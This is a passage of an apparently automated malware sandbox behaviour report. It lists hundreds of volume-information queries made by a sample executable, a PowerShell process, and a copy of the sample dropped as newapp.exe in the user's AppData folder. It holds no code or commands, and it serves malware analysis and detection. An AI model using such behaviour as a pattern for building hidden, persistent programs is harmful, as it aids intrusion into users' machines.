                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Users\user\Desktop\dhPWt112uC.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
